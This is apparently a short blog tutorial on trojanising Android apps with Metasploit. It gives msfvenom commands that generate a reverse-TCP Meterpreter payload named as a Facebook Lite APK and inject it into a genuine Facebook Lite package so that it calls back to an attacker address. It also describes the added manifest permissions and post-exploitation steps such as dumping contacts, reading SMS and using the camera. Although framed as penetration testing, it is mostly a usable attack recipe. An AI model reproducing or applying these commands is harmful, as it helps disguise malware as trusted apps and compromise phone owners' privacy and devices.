In this article, I will show you how to inject a few payloads of apk files. Hope it will bring you a useful knowledge.
The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However if in an engagement time is not a factor then the manual method should be considered.
Before anything else the payload needs to be generated that it will be used in order to compromise the mobile device. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK file.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.87 LPORT=4444 R > facebookLite.apk
Injecting Payloads to APK
Before the injection payload to file APK, we are necessary to have the target APK file. You can download apk files from your phone, download through the Google Play Store or third party.
There are various scripts publicly available that can inject a Metasploit payload into an Android application. However in certain scenarios it is possible to use MSFVenom as well in order to create and inject automatically a Metasploit payload.
# msfvenom -x com.facebook.lite.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=4444 -o facebook.apk
MSFVenom will decompile the application and it will try to discover the hook point of where the payload will be injected. Furthermore it will poison the Android Manifest file of the application with additional permissions that could be used for post exploitation activities. The output can be seen below:
APK injector will use the Apktool in order to fully decompile the application, inject the payload and then compile it again and sign it.
Then APK Injector will attempt to inject the payload inside a file and use again Apktool to compile and sign the application.
A Metasploit listener should be configured in order to receive the payload:
From the moment that the user will install and open the modified APK on his phone the payload will be executed and a Meterpreter session will be returned.
There are a list of tasks that it can be done after the exploitation like to check if the device is rooted, dump the contact list, retrieve the SMS messages of the phone or just use the camera phone to take a snapshot. All of these activities depend on the permissions that the application that carries the payload has which are defined in the Android manifest file.
You con see video demo below: